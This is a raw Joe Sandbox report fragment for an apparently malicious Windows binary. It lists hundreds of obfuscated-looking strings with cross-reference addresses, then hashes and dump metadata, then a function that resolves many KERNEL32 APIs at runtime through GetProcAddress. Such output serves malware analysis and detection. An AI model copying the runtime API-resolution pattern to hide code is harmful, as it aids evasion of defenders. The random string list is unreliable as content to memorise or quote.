8DUN0Z5EKDK, xrefs: 004029DE
=-.Z,1, xrefs: 004036E0
PKQ46J4RO3ZLE, xrefs: 00403AF5
$^9-&\2, xrefs: 00403870
@ft, xrefs: 0040295A
RWXUCS0GWOJWEG, xrefs: 00402AF1
#;<Y], xrefs: 00404509
Z8V4X2, xrefs: 00403677
OAO1YJYR4HHCJPL7SADORW, xrefs: 00402916
%]=~X505&/, xrefs: 00402902
OODTYIR4EAPFD2Q3NI5VX, xrefs: 00402948
LN2E86GGSIIV, xrefs: 004028E4
1SGJHGJR0SIVNU, xrefs: 00402993
XTYZOKL8, xrefs: 00403DE3
5CW1, xrefs: 0040403B
UUFT9S, xrefs: 0040422F
BTUZILC92, xrefs: 00404248
+&[+, xrefs: 00404554
312A8A55EI081DYFI5YPP4S4BCAGR04WLJOM, xrefs: 00404581
@&x, xrefs: 00404386
6FPA3S84D, xrefs: 00403EAB
KYISDL7FLAU6HXBJ3QLJFL2B, xrefs: 00402899
DTLV, xrefs: 00403E79
S2089O8AQMLVPNOLN, xrefs: 0040406D
41A5Q06RUFF652ZZE8EXZW6XO7VHVPF8LG4FCH3IMU1J5B2PB0BRSARH5NQSFZ6FAGVY7TX7F5KE4, xrefs: 004037D5
32TU57GITV3WZ, xrefs: 00403BA4
A40X4N, xrefs: 00402D30
QK31663I6F, xrefs: 00402C68
52$E"A'['|wvt&Z4, xrefs: 00403E1A
Y7EA62J3W98T12NGHBSMPX, xrefs: 00402CFE
`t, xrefs: 00402BCB
KQFNLOWYN5FTKD, xrefs: 00402B23
E1JHXZSL0Z7V53, xrefs: 0040322B
NRBE3IB, xrefs: 004036DB
'Y4:QB6-"%3,CAw2*>, xrefs: 00404360
D4W0K, xrefs: 004035C8
K8KJ8H42XQIPD7AYZ1JK2UNKCDX6DEV548FFH, xrefs: 00403807
VT8XF2KHXYQSHXA2, xrefs: 00403195
_t, xrefs: 00402DA6
87ZUXN1GRW3IG6QILUHZ4FWXHHURINJTV8JTAJIAI0JUC0ANN4ECDJ83KBMP3K8DMJXHW6HCMHRE6BVRGGDOJGQM, xrefs: 00404199
7TE9SJDLOB2IOEI8V7WDPBZU2EP2AVE7YW50I1BIDSKSY38F77FRWZ263TGN4LL364U2IRZ36O970G69GK4CPXK83, xrefs: 00404180
FLHIN8U, xrefs: 004026C8
CPWX3, xrefs: 004040EA
SOJ98J3TUKIZG884, xrefs: 0040317C
G3WMMJ2, xrefs: 004039B0
09HUH, xrefs: 00402F88
CZX0NDTL2VZUBIAH, xrefs: 00404329
(?:+8.jB0-, xrefs: 00404315
EB78UKSBI, xrefs: 004038B6
Z31ZB91WXE511L586D2VEU9HNEE0M3EGIOCJR2HVF7CK, xrefs: 004039FB
O.4, xrefs: 004044F0
T4PL4LH, xrefs: 004034E7
<[!/, xrefs: 004043DD
VJNVZOD22DTIQBXYLUZP, xrefs: 00403357
BFRYO, xrefs: 00403997
THP2H6H, xrefs: 00403690
h)x, xrefs: 00404561
9V1A1LXEZVUXGL9, xrefs: 00403451
ATM66ODA6OL628SXQ9SZTH1Q8CXA0W5TDRPY7V, xrefs: 0040443C
Q4JJSBFNZEI7PMTLU, xrefs: 00404054
XVUNQE5341A, xrefs: 00402C36
DENL92V0J, xrefs: 0040349C
OKC9WOPZ0GXJYC, xrefs: 00403EDD
K0QV1QG4UZ, xrefs: 00403500
D2CRFS85JVXSUX, xrefs: 00402DC6
(67BG7"&, xrefs: 004043C4
p&x, xrefs: 0040401B
LWVPXJ28, xrefs: 00402E2A
N7YS8Q2QPHJRO9EFWDQVAZ775D6Z9, xrefs: 00404423
G5ODQNSYLUSFVW0JE, xrefs: 00403C53
UV3O5H5HSGPX, xrefs: 00404261
+$)8, xrefs: 00403E7E
KPTMQID4TK, xrefs: 00404310
6>_;* A, xrefs: 00403569
P92B, xrefs: 004043F1
ANU59, xrefs: 00404504
P6SAXTMB0VZJK7HBQNHIZFYRTB3FKPG92ATK78P16Z6JMJ4WL705X31JHARW0G1KOZRKO6ES8PLAJPEKHH3MZLM9JKC6R3B, xrefs: 0040365E
YZE3JSJ5ILV3N7, xrefs: 00403C21
5E85HUJ7STUMITDOMMV0BJO, xrefs: 00403CD0
GL8T4OLBAW8CNV0AGNOWOUIBRX1999Z8PW1RNZJT8EOKTGDLMFCYM6LVC7CGWLBA69W14IWRD5YKF8SKUPW47BWSK, xrefs: 0040414E
DXUCIZQZDCLJ2LL6J, xrefs: 004031C7
UVOPND3HLK11ODTES741, xrefs: 0040292F
UQ0PCE2, xrefs: 00403564
FS7E9JQ7F, xrefs: 00404009
PTGQ8FHU4, xrefs: 004034B5
IE6R4C5E2RFNL3, xrefs: 00403820
H'x, xrefs: 004041C4
8M5C7VH3, xrefs: 00404103
70651A4ZM, xrefs: 00402ABF
DJ'63_o" P8k'($, xrefs: 00403D84
EC:3:0aiS7]1U9j:$:), xrefs: 00403375
8Y5XO, xrefs: 00403519
**Y9]&FkA#*'8V, xrefs: 00403825
at, xrefs: 00402E23
WADGCG1, xrefs: 004031F9
981WPI2QW3U, xrefs: 00402AD8
DNE2A5OZOUS6, xrefs: 004027EA
STZT6ZOL5TYKAGX65LSX05J, xrefs: 00402A42
Z4WE96P2D, xrefs: 00403FA5
GOQWD6WDOOTULRETVURIBPEO2VHYHC5NDRY3F4A8BH0U8ZI7SLMREKJ0KB4RY75MSGR43KN0TSH3ZUQCMJF50OI2I, xrefs: 00404167
ft, xrefs: 00402941
BJ39YTNIWQE6HQGSY, xrefs: 00403A5F
9IAXJDE, xrefs: 00403901
(5\7X$ 2jQ'', xrefs: 0040396A
0UJGPRV77G6NY3KW9BSGN, xrefs: 00402E5C
AQWQTAQ, xrefs: 00403B72
6ABPCIX, xrefs: 00403532
JHKO5JSA, xrefs: 00403BEF
B8KEBZGC56WW, xrefs: 00403DFC
KPJMN1387IP, xrefs: 00402BD2
YURMOUSUJRUBSS9K0AP, xrefs: 0040330C
FINPGYRC, xrefs: 004035E1
8PHST7ABJS3D, xrefs: 00402D49
LZ6W65RZMUFS, xrefs: 00402B55
@at, xrefs: 00403288
x(x, xrefs: 004044FD
7JJBA5VW7Q8QX0OT7IQBD37AKNATD26P, xrefs: 004035FA
`!x, xrefs: 00404548
Z5R8YORCLK56WPH2FCAW7BXY373QGN45IUUTVPLBLZTX84R5, xrefs: 00404487
M3IDTLF5G0BKR9BTIPFGDLGFTMN, xrefs: 00402DAD
A1KKSDWUG13, xrefs: 0040373F
S1TY127QMUEGQAA, xrefs: 00402DDF
4Q76WN7LPXVYC1N1SVP, xrefs: 00402FD3
MKDJU5T1QYH7R41W64BF, xrefs: 004026A5
4+>&0B&, xrefs: 004039CE
bt, xrefs: 00402A54
LDVE8L2Z29FSD89153K5FVMW6NE, xrefs: 00402F3D
45RGY, xrefs: 004034CE
NLXVTKHHWPGKZI, xrefs: 0040459A
2F2A5Y3F9F7Y, xrefs: 00403DCA
LRC7ZVAG4U8ZS5MUF2, xrefs: 00403839
jgg, xrefs: 00403F46
X2NEGG4NXPKZXKY0KDXXWIYQERRDEMWZMNHVDN9SC1N0, xrefs: 004037EE
-67+., xrefs: 0040399C
7EFD0XZAWW6, xrefs: 00403F0F
P04W332NLJZNWNU5VYNE, xrefs: 004042AC
T8MRM2W9KAMOI3LKQH, xrefs: 004029C5
MO7N, xrefs: 0040454F
YYIF6HCEMPK4F9Q0K0QCO9I, xrefs: 004033BB
AT5OEEP44I5DALKHMMK3Z00NMO5L0R66LPVA22G45UTFTRTOEC7CR9UJ3RBZJ, xrefs: 00403483
IIPTD8T8, xrefs: 00403212
K0VH00OKMIWI12YDNX, xrefs: 0040435B
YG8#G, xrefs: 00404473
*9*5TA0{<>/, xrefs: 00402C9F
X&x, xrefs: 004043B8
NJ53RQKI, xrefs: 0040409F
OUROFRRK, xrefs: 0040370D
'<:?!0>/, xrefs: 004035E6
TMP6NEJ, xrefs: 0040438D
#VT6, xrefs: 004043F6
7F16ZDZPLRG0II6N, xrefs: 00403118
|!9+D?s,'!, xrefs: 004029E3
C8TI2M9Z13AUWFZU4E8, xrefs: 00402BB9
EB3VRO, xrefs: 00403E2E
N34X, xrefs: 00403E47
TAUD22H4MCGO5F, xrefs: 00403F28
604F6ANB5V4N3, xrefs: 004028CB
9F78FBWDTJG, xrefs: 00402C81
SPHHNO3AF, xrefs: 00402A10
KOONPVU0PJKO13K, xrefs: 0040346A
WREFRBC56WLWO3XOHI, xrefs: 004027D1
,+U@@<,(1gD'%86U+, xrefs: 0040378F
KLSR08XTUCY3QUWWHFKVQXLV, xrefs: 004029AC
45P @&A;}?=4, xrefs: 00404266
GZAX5ULFFWYHR, xrefs: 0040333E
PTNOVD, xrefs: 004036C2
R9H8OQ76OUYZ4, xrefs: 00402EF2
THZKINALM58FUWGQP47DZ4LEU6EP0C, xrefs: 00403FBE
0O5A3UVDRCBUYEM388OOK1H7WM, xrefs: 00402EC0
0P42MTY39SGD5, xrefs: 004039E2
VK2ANVVWKEZGV0UC1T, xrefs: 00402D62
*$>$;0`)=97>=f?U9$, xrefs: 00403311
WQNCQU2AJY, xrefs: 00402835
/?3>> 9)`, xrefs: 00403023
QOPQATZU1ZLXIH4EBC9LJJD, xrefs: 00402803
ZIM6UKCTRS, xrefs: 00403005
@`t, xrefs: 00402C16
5BAGINIH, xrefs: 00403F5A
CZ2EXNES6U3KT, xrefs: 00403D66
BN5TWUAI35S, xrefs: 0040394C
47JL0EVWCRVED4MBH, xrefs: 0040391A
Ybl7-;/L3$,L?,xw, xrefs: 00403B90
#*:!X)S, xrefs: 0040456D
X0E9P4D, xrefs: 00404293
`t, xrefs: 004030F8
h,F0@9:W, xrefs: 00404108
F4U, xrefs: 00403A2D
4PEY, xrefs: 004035AF
SSR13XZAFEXI, xrefs: 00402CE5
7DJ5WW2ZCK, xrefs: 00402880
WH009VUDWEQM, xrefs: 004032F3
KAKOSMT, xrefs: 00403726
`VL=, xrefs: 00403E4C
8A929PH626, xrefs: 00402BA0
DNURP0G730V1F, xrefs: 00403D4D
10J8M, xrefs: 00403F8C
.t, xrefs: 00404147
KW58261T8T, xrefs: 00402A5B
JDX54RPU, xrefs: 004043BF
4BO3P, xrefs: 004042F7
Z4GZ, xrefs: 0040357D
FCQ2AB2KIA8, xrefs: 00402867
7L4PVD0TVA5VUF52, xrefs: 00402EA7
9AVI24DONS0, xrefs: 00403A14
`_t, xrefs: 004030C6
AG>}y, xrefs: 004034D3
RQRTRQ3, xrefs: 00403613
XG3Q1HEAD8IN, xrefs: 00403965
O75ORX9DHRUVC6V8C, xrefs: 00403F41
i~>6Z, xrefs: 004040EF
L66XI3E1, xrefs: 004044B9
1HQNO1Z3, xrefs: 004042DE
(&x, xrefs: 0040428C
5EJ7F69T1JE, xrefs: 00403082
3KIFXIFT9UL033ONPW1HQ, xrefs: 00404216
X4OJ, xrefs: 004043D8
Q5JWHU4F, xrefs: 004041FD
CJRJU6U, xrefs: 004039C9
g -t*YJ1z/<, xrefs: 00403087
N5JEC0AI7OT6H4EYLK, xrefs: 00403BBD
HTXVQMSJN85K61D2IWY, xrefs: 00403A91
AHFGE, xrefs: 00403F73
CZ3, xrefs: 004040B8
@bt, xrefs: 004029D7
9DL4VYVX01KBJE, xrefs: 0040297A
58DFE5BOAGZ, xrefs: 00402BEB
2^&!^, xrefs: 00402CB8
AT4TH115IRW2H, xrefs: 00403771
XURNJ98LWCWHB6PH, xrefs: 004031AE
PYN0CRAGX, xrefs: 004042C5
2CA6NFYYLD0G4, xrefs: 0040341F
6ICO7HV81FMKJPMAJ38RMBK, xrefs: 0040389D
13LS4, xrefs: 0040446E
BHV6MDAFIWS478M, xrefs: 004038E8
N17ACSBJ069FZGVTT, xrefs: 00404022
U4I4CL3PJUSELQC, xrefs: 00403B40
3KAJSHSI, xrefs: 00403CB7
)AT)Yi,%_, xrefs: 00402CD1
FOVBXURSX9, xrefs: 004036F4
m+> )X=o, xrefs: 004042E3
w)P*., xrefs: 0040351E
2MQM6AXFTYPELQ0UOUQZ, xrefs: 004030B4
PBVRUVWU, xrefs: 004031E0
2OAX1Q5TRE9V2ZT, xrefs: 00403BD6
QMFBKEHMO4QG, xrefs: 004038CF
G1)]z, xrefs: 004042FC
W57KRBHNNSGU0HFR40FW, xrefs: 00402961
-^,"=7y?4^], xrefs: 00403744
^t, xrefs: 00403143
KOV7U4NNC5UVXBMR, xrefs: 00403B27
2CCFPKMKW, xrefs: 00403B59
LUCZUANWIP5OHK, xrefs: 004028B2
6-1#, xrefs: 004037C1
0'x, xrefs: 00403F3A
VTTI0754SXJDDFE37, xrefs: 00403438
WD73ZWU2UG9, xrefs: 00402FA1
ZI5BFU5X96EJBO, xrefs: 00403ADC
X1W96USI6UI2LWS0, xrefs: 004030E6
T3UMRJGW7GW1HWZ, xrefs: 00403D1B
SUAE0ZEYH1OKPDOAQ215741DKJS, xrefs: 00404455
! &CG5=3h!4%, xrefs: 00402CEA
8[7%Zvh, xrefs: 004034EC
5QRWN38SRFKWR, xrefs: 00403852
FSJMPAEPUPRNSS1CE0B6UHOPVGO7A1T4CP6GUP40ZGS9EJKQV38GULI8E30JVHP26XKDWURY6KHOZOLM58MH3MK1G7C0YUER0ZDR8H4ALJKJD4J0SONX5I9TNT6, xrefs: 0040411C
WS7O2G4BQIK, xrefs: 004043A6
*=1Z2?23['At D!<2W, xrefs: 0040383E
RL79B7RHO4Z, xrefs: 00403AC3
991#&, xrefs: 00404522
QXXG, xrefs: 004037BC
RZNZ5V0LIUUK1HZK7G, xrefs: 00403FF0
`bt, xrefs: 00402C2F
Y25Y0GHI3, xrefs: 00402CCC
92V3, xrefs: 004033A2
GBC8TMEC21KJ, xrefs: 004033ED
D40B62N8K0CJ6R63TLWD, xrefs: 00402D94
QTHEO9QB8RJQ5VWKVY5ARFCH, xrefs: 00402D7B
CQV0L5N6BMCFZB6X, xrefs: 00403E15
N5OAYYCBTIKBH, xrefs: 00403C08
IZHAGHXWI, xrefs: 00402A29
&x, xrefs: 00404322
p(%W6;a39., xrefs: 00402885
POLHENSF8VGX9MIBW, xrefs: 00403B8B
[!M6;F>^u, xrefs: 00402B73
XLCLWNMO7, xrefs: 0040301E
4DH8YKIVO6ROD, xrefs: 00403050
2FI2D21R, xrefs: 004041CB

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: lstrlen$Heap$AllocateEntryPointProcessProtectVirtualstrlen
String ID: %]=~X505&/$=-.Z,1$ O.4$ _t$ `t$ at$ bt$ ft$! &CG5=3h!4%$!Z%(+%J$#*:!X)S$#;<Y]$#VT6$$^9-&\2$&7!;JW$j$'*'%/Z<$'<:?!0>/$'Y4:QB6-"%3,CAw2*>$(&x$(5\7X$ 2jQ''$(67BG7"&$(?:+8.jB0-$)AT)Yi,%_$*$>$;0`)=97>=f?U9$$**Y9]&FkA#*'8V$*9*5TA0{<>/$*=1Z2?23['At D!<2W$+$)8$+&[+$,+U@@<,(1gD'%86U+$-&!6&*$-67+.$-^,"=7y?4^]$/?3>> 9)`$0'x$09HUH$0O5A3UVDRCBUYEM388OOK1H7WM$0P42MTY39SGD5$0SC8RVYMTA5UAU623L6C$0UJGPRV77G6NY3KW9BSGN$10J8M$13LS4$15TEL3BYS3Y4QRGBV$1EXA771VGH1QY$1HQNO1Z3$1SGJHGJR0SIVNU$20QDC4GFKPUT$228CFBMEZZ$2CA6NFYYLD0G4$2CCFPKMKW$2F2A5Y3F9F7Y$2FI2D21R$2K04W$2MAGY9WR9$2MQM6AXFTYPELQ0UOUQZ$2OAX1Q5TRE9V2ZT$2^&!^$312A8A55EI081DYFI5YPP4S4BCAGR04WLJOM$32TU57GITV3WZ$35<+ld$3KAJSHSI$3KIFXIFT9UL033ONPW1HQ$4+>&0B&$41A5Q06RUFF652ZZE8EXZW6XO7VHVPF8LG4FCH3IMU1J5B2PB0BRSARH5NQSFZ6FAGVY7TX7F5KE4$45P @&A;}?=4$45RGY$47JL0EVWCRVED4MBH$4BO3P$4DH8YKIVO6ROD$4N5E5IV5RCK$4PEY$4Q76WN7LPXVYC1N1SVP$52$E"A'['|wvt&Z4$58DFE5BOAGZ$5BAGINIH$5CW1$5E85HUJ7STUMITDOMMV0BJO$5EJ7F69T1JE$5QRWN38SRFKWR$6'*ia/ T$6-1#$604F6ANB5V4N3$62VZNUR60X1D8W5XHUK$6>_;* A$6ABPCIX$6DCRZ3E3PK1GMBPD6P$6FPA3S84D$6ICO7HV81FMKJPMAJ38RMBK$6ZMIOY1T84DYH$70651A4ZM$73TBV20KN6WESPP$77Y0UQ56B20HK3BI9$7DJ5WW2ZCK$7EFD0XZAWW6$7F16ZDZPLRG0II6N$7JJBA5VW7Q8QX0OT7IQBD37AKNATD26P$7L4PVD0TVA5VUF52$7R9DX6G04$7TE9SJDLOB2IOEI8V7WDPBZU2EP2AVE7YW50I1BIDSKSY38F77FRWZ263TGN4LL364U2IRZ36O970G69GK4CPXK83$7W13NN4COVD7SQ2W$80H5D46CH4UX3TZXNU3$87ZUXN1GRW3IG6QILUHZ4FWXHHURINJTV8JTAJIAI0JUC0ANN4ECDJ83KBMP3K8DMJXHW6HCMHRE6BVRGGDOJGQM$893OVROOTYR3C$8A929PH626$8DUN0Z5EKDK$8F8IJ3YE$8FS0J$8J799TR2BTKM4$8M5C7VH3$8PHST7ABJS3D$8Y5XO$8[7%Zvh$92V3$981WPI2QW3U$991#&$9AVI24DONS0$9C5KXVC9KY58$9DL4VYVX01KBJE$9F78FBWDTJG$9IAXJDE$9QJ862H7$9V1A1LXEZVUXGL9$:8! =#J$;Q"%F>5Poz$<[!/$=/*31%; 8$i!*.$@&x$@_t$@`t$@at$@bt$@ft$A0JE62LBE7OJOI8XTV34ANNAJII2SWGG50CSNC89VOZTFGLGDQIDBLYXMJ5YTSSS1IOYFQKQX4JVY44C6CYCNCETBPFEHKPC6G172XAXG2QHCD8SO31R$A1KKSDWUG13$A40X4N$A5QPEEXJZY8TD8GZ$A6CM23RTLW7$AEXC25X6H$AG>}y$AHFGE$ANU59$AQWQTAQ$AT4TH115IRW2H$AT5OEEP44I5DALKHMMK3Z00NMO5L0R66LPVA22G45UTFTRTOEC7CR9UJ3RBZJ$ATM66ODA6OL628SXQ9SZTH1Q8CXA0W5TDRPY7V$B8KEBZGC56WW$BFRYO$BHV6MDAFIWS478M$BJ39YTNIWQE6HQGSY$BN5TWUAI35S$BTUZILC92$C0V0$C8TI2M9Z13AUWFZU4E8$CEUOYBD1ILSPZQJ9783KXKE$CI52N2FDR7VG9MDW$CJRJU6U$CKJVR71A6GBOYSY84K6ZZBN1ODCCLXKAIDXA88GXYLWDLTG2H3J$CPWX3$CQV0L5N6BMCFZB6X$CZ2EXNES6U3KT$CZ3$CZX0NDTL2VZUBIAH$D1PKYAL672EQNO9GEHPXUC$D2CRFS85JVXSUX$D40B62N8K0CJ6R63TLWD$D4W0K$DENL92V0J$DFLVWPGMP$DJ'63_o" P8k'($$DNE2A5OZOUS6$DNURP0G730V1F$DTLV$DXUCIZQZDCLJ2LL6J$E14RI11XSM9G6G73DZ$E1JHXZSL0Z7V53$EB3VRO$EB78UKSBI$EC:3:0aiS7]1U9j:$:)$ET3GL1QH$EUNV5MZFG2BM5I$F4U$FCQ2AB2KIA8$FINPGYRC$FL5KF7R2Z$FLHIN8U$FOVBXURSX9$FS7E9JQ7F$FSJMPAEPUPRNSS1CE0B6UHOPVGO7A1T4CP6GUP40ZGS9EJKQV38GULI8E30JVHP26XKDWURY6KHOZOLM58MH3MK1G7C0YUER0ZDR8H4ALJKJD4J0SONX5I9TNT6$FV4FQ5SFOV6X8$G1)]z$G3WMMJ2$G5ODQNSYLUSFVW0JE$GBC8TMEC21KJ$GL8T4OLBAW8CNV0AGNOWOUIBRX1999Z8PW1RNZJT8EOKTGDLMFCYM6LVC7CGWLBA69W14IWRD5YKF8SKUPW47BWSK$GOQWD6WDOOTULRETVURIBPEO2VHYHC5NDRY3F4A8BH0U8ZI7SLMREKJ0KB4RY75MSGR43KN0TSH3ZUQCMJF50OI2I$GR9OBRL7CRQA4SPD2US$GRJVWGBSFWGMV$GS6933LDM1IDNGGC7NXW$GZAX5ULFFWYHR$H'x$H427P3R$H78NT7O7Y$H8GP$HTXVQMSJN85K61D2IWY$I2J13B82NCX4$I932E8053QCPA$IE629LXMU27BWVW8N$IE6R4C5E2RFNL3$IIPTD8T8$IMT57S0030X7O7QK0EYILKRI9FO8SGBUWFM8N8D1CJ52ZL$IN7HZL8ZOTQSD092$ISUEL6F9$IV4O64EJHPHUROD1$IZHAGHXWI$J3=Q9$J3YO9GW7OQAW1VROWW66$JDX54RPU$JHKO5JSA$K0QV1QG4UZ$K0VH00OKMIWI12YDNX$K2UIOJW0HYP3MN3M$K8KJ8H42XQIPD7AYZ1JK2UNKCDX6DEV548FFH$KAKOSMT$KLSR08XTUCY3QUWWHFKVQXLV$KOONPVU0PJKO13K$KOV7U4NNC5UVXBMR$KPJMN1387IP$KPTMQID4TK$KQFNLOWYN5FTKD$KW58261T8T$KYISDL7FLAU6HXBJ3QLJFL2B$L2IJYC7ZLWQ4OTARYPZMNE7FO190509W$L64$L66XI3E1$LDVE8L2Z29FSD89153K5FVMW6NE$LN2E86GGSIIV$LRC7ZVAG4U8ZS5MUF2$LRT990U$LUCZUANWIP5OHK$LUGXGLKZ$LW8X21WBTTV$LWVPXJ28$LZ6W65RZMUFS$M3IDTLF5G0BKR9BTIPFGDLGFTMN$MKDJU5T1QYH7R41W64BF$MO7N$MVZFH$N/YQ('#j0&+$N17ACSBJ069FZGVTT$N34X$N5JEC0AI7OT6H4EYLK$N5OAYYCBTIKBH$N7YS8Q2QPHJRO9EFWDQVAZ775D6Z9$NJ53RQKI$NLXVTKHHWPGKZI$NNSYKO$NOIR9N6$NQ53KAT5LF4MQU$NRBE3IB$O75ORX9DHRUVC6V8C$OAO1YJYR4HHCJPL7SADORW$OKC9WOPZ0GXJYC$OODTYIR4EAPFD2Q3NI5VX$OUROFRRK$P04W332NLJZNWNU5VYNE$P6SAXTMB0VZJK7HBQNHIZFYRTB3FKPG92ATK78P16Z6JMJ4WL705X31JHARW0G1KOZRKO6ES8PLAJPEKHH3MZLM9JKC6R3B$P92B$PBVRUVWU$PI8MIA9N0G9PN$PKQ46J4RO3ZLE$POLHENSF8VGX9MIBW$PTGQ8FHU4$PTNOVD$PUHBJMTFTA2ILNR4MZEJ9HD5$PYN0CRAGX$Q4JJSBFNZEI7PMTLU$Q5HV2WZIZDV$Q5JWHU4F$QJKXUZ3X9AF91T87UQV$QK31663I6F$QMFBKEHMO4QG$QOPQATZU1ZLXIH4EBC9LJJD$QTHEO9QB8RJQ5VWKVY5ARFCH$QXXG$R1925G$R9H8OQ76OUYZ4$RDQES9N1C6T2RP5MGGBGM$RL79B7RHO4Z$RQRTRQ3$RWJO6A1WPEAZ0B$RWXUCS0GWOJWEG$RY6ZI8M92P9SG$RZLN85DZNQFV6O$RZNZ5V0LIUUK1HZK7G$S1TY127QMUEGQAA$S2089O8AQMLVPNOLN$S6REQ7J1IILDZ8O76VY$SOJ98J3TUKIZG884$SPHHNO3AF$SSR13XZAFEXI$STZT6ZOL5TYKAGX65LSX05J$SUAE0ZEYH1OKPDOAQ215741DKJS$T0KEGT66VO3I$T2LJO2A$T3UMRJGW7GW1HWZ$T4PL4LH$T8MRM2W9KAMOI3LKQH$TAUD22H4MCGO5F$THP2H6H$THZKINALM58FUWGQP47DZ4LEU6EP0C$TMP6NEJ$TTCGOYJWP44R8HP9DLJ0X5BSEUS9HI4$U4I4CL3PJUSELQC$UA58PAYB4YGZ18KHSAZ8Q8OQ1DULX6K2LTRK4V$UQ0PCE2$USPKSEDQOH9Y$UUFT9S$UV3O5H5HSGPX$UVOPND3HLK11ODTES741$V3IPFEF1K$V5C0W8LAN7H0B2C3I6OX1ALZ$VDR1229WNH$VJNVZOD22DTIQBXYLUZP$VK2ANVVWKEZGV0UC1T$VT8XF2KHXYQSHXA2$VTTI0754SXJDDFE37$VZLJ47B1X$W4KPBJNX1MP$W57KRBHNNSGU0HFR40FW$WA30J1NSE3G1Q6XZQSGR5$WADGCG1$WB05146J$WD73ZWU2UG9$WH009VUDWEQM$WNXUKG7A3C$WQNCQU2AJY$WREFRBC56WLWO3XOHI$WS7O2G4BQIK$WY&]>$X&x$X0E9P4D$X1W96USI6UI2LWS0$X2NEGG4NXPKZXKY0KDXXWIYQERRDEMWZMNHVDN9SC1N0$X4OJ$XDTG8BCEJ62SD18V7USVT$XG3Q1HEAD8IN$XLCLWNMO7$XR2UQXQRN9C84VSD$XTYZOKL8$XURNJ98LWCWHB6PH$XVUNQE5341A$XYY6OLZ6I3YWEN017SCF4QXCWV0R$XZUG30H53NO$Y25Y0GHI3$Y7EA62J3W98T12NGHBSMPX$YG8#G$YPM2ZJN078OS4Y456TC$YPRQ7JHFQ33TPQK$YQFB51YUXRC$YS19LGZX9L4NXDL5TCAXMYMHJHRWSZTDOLFSTJ8DOGJOYA0TTMQRM5U9GU0EYCFJ108M73MJD7JFP7SIQ7DFJC1T0$YURMOUSUJRUBSS9K0AP$YYIF6HCEMPK4F9Q0K0QCO9I$YZE3JSJ5ILV3N7$Ybl7-;/L3$,L?,xw$Z31ZB91WXE511L586D2VEU9HNEE0M3EGIOCJR2HVF7CK$Z4GZ$Z4WE96P2D$Z5R8YORCLK56WPH2FCAW7BXY373QGN45IUUTVPLBLZTX84R5$Z7DCJ9ICMOA7XH0QG$Z8V4X2$ZI5BFU5X96EJBO$ZIM6UKCTRS$ZM59OW3RYZ45Y5F2PX$ZTS8RVY9HUX7$[!M6;F>^u$`!x$`'x$`VL=$`_t$``t$`at$`bt$g -t*YJ1z/<$h)x$h,F0@9:W$i~>6Z$jgg$kf*).$m+> )X=o$p&x$p(%W6;a39.$t@?.$w)P*.$x'x$x(x$|!9+D?s,'!$&x$.t$^t$_t$`t$at$et
API String ID: 3897645687-1262049817
Opcode ID: 28abc214ade66850bc3563f492ce775f036cabad6efe5a07caefe98352617a8f
Instruction ID: 250b26796e586556a104c4e04370b3e784e6700976798213588a6fe8eef9eac8
Opcode Fuzzy Hash: 28abc214ade66850bc3563f492ce775f036cabad6efe5a07caefe98352617a8f
Instruction Fuzzy Hash: 1DE295B9FD0320BEE2106BE17D03B243AA197A1F09FA4113BFB04792D2F5ED16545A5E

Function 00419C10 Relevance: 233.4, APIs: 112, Strings: 21, Instructions: 684
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(75900000,007463C0), ref: 00419C2D
GetProcAddress.KERNEL32(75900000,007465E0), ref: 00419C45
GetProcAddress.KERNEL32(75900000,00750370), ref: 00419C5E
GetProcAddress.KERNEL32(75900000,007505B0), ref: 00419C76
GetProcAddress.KERNEL32(75900000,00750598), ref: 00419C8E
GetProcAddress.KERNEL32(75900000,007504A8), ref: 00419CA7
GetProcAddress.KERNEL32(75900000,0074A558), ref: 00419CBF
GetProcAddress.KERNEL32(75900000,00750490), ref: 00419CD7
GetProcAddress.KERNEL32(75900000,00750388), ref: 00419CF0
GetProcAddress.KERNEL32(75900000,007504C0), ref: 00419D08
GetProcAddress.KERNEL32(75900000,00750550), ref: 00419D20
GetProcAddress.KERNEL32(75900000,00746600), ref: 00419D39
GetProcAddress.KERNEL32(75900000,00746620), ref: 00419D51
GetProcAddress.KERNEL32(75900000,00746640), ref: 00419D69
GetProcAddress.KERNEL32(75900000,007462A0), ref: 00419D82
GetProcAddress.KERNEL32(75900000,007505C8), ref: 00419D9A
GetProcAddress.KERNEL32(75900000,007504D8), ref: 00419DB2
GetProcAddress.KERNEL32(75900000,0074A300), ref: 00419DCB
GetProcAddress.KERNEL32(75900000,00746240), ref: 00419DE3
GetProcAddress.KERNEL32(75900000,007502E0), ref: 00419DFB
GetProcAddress.KERNEL32(75900000,007504F0), ref: 00419E14
GetProcAddress.KERNEL32(75900000,007502F8), ref: 00419E2C
GetProcAddress.KERNEL32(75900000,007503B8), ref: 00419E44
GetProcAddress.KERNEL32(75900000,00746220), ref: 00419E5D
GetProcAddress.KERNEL32(75900000,00750508), ref: 00419E75
GetProcAddress.KERNEL32(75900000,00750310), ref: 00419E8D
GetProcAddress.KERNEL32(75900000,00750568), ref: 00419EA6
GetProcAddress.KERNEL32(75900000,00750328), ref: 00419EBE
GetProcAddress.KERNEL32(75900000,007503A0), ref: 00419ED6
GetProcAddress.KERNEL32(75900000,00750340), ref: 00419EEF
GetProcAddress.KERNEL32(75900000,00750448), ref: 00419F07
GetProcAddress.KERNEL32(75900000,00750400), ref: 00419F1F
GetProcAddress.KERNEL32(75900000,00750358), ref: 00419F38
GetProcAddress.KERNEL32(75900000,00749818), ref: 00419F50
GetProcAddress.KERNEL32(75900000,00750538), ref: 00419F68
GetProcAddress.KERNEL32(75900000,007503D0), ref: 00419F81
GetProcAddress.KERNEL32(75900000,00746000), ref: 00419F99
GetProcAddress.KERNEL32(75900000,007503E8), ref: 00419FB1
